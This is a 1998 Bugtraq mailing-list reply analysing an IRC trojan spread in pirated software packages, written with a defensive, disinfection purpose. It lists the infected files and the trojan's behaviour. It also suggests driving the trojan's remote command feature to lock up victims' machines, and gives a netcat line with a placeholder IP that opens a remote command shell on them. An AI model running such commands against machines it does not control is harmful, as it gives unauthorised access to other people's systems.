Bugtraq mailing list archives
Re: Internet Wide DOS Attack using IRC
From: cluster () VIDEOTRON CA (Samuel Cossette)
Date: Sat, 3 Oct 1998 14:41:54 -0400
It's not the DO command of mirc, it's a built-in command; it's the equivalent of /QUOTE or /RAW in an IRC client, and it sends the data directly to the server.

At this time I have found 2 directly infected files: Packet Handler Firewall and FlashFXP v1.0, both distributed on an XDCC bot on #warez950-dcc, in a zip file with some fake .nfo and a SETUP.EXE (oce.exe) of 354k. quicktools.ocx (EZFTP OLE Control Module) and Mswinsck.ocx are also included.

Another interesting thing: the server opens port 15150 and prompts "Enter your username:", probably an FTPD.

The trojan can also modify your mirc.ini; it adds auto-op and modifies your current script.
With the DO command enabled, they gave us the means to remotely disable this trojan. Something to the effect of: msg <nick> .do del c:\windows\system\oce*.* Then, msg <nick> .do <some evil command to lock up the machine, forcing a reboot>.
...
The mIRC DO command is very powerful, and can be used to install netcat on the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L -p <any port> <your ip> -t -e command.com, giving a remote command prompt to investigate/disinfect the machine.
______________________________________________________________________________
George Imburgia                          e-mail: gti () hopi dtcc edu
Systems Administrator                    Phone: (302)739-4068
Delaware Technical & Community College   Fax: (302)739-3345
Office of the President                  Pager: (302)741-5962
Samuel Cossette cluster () videotron ca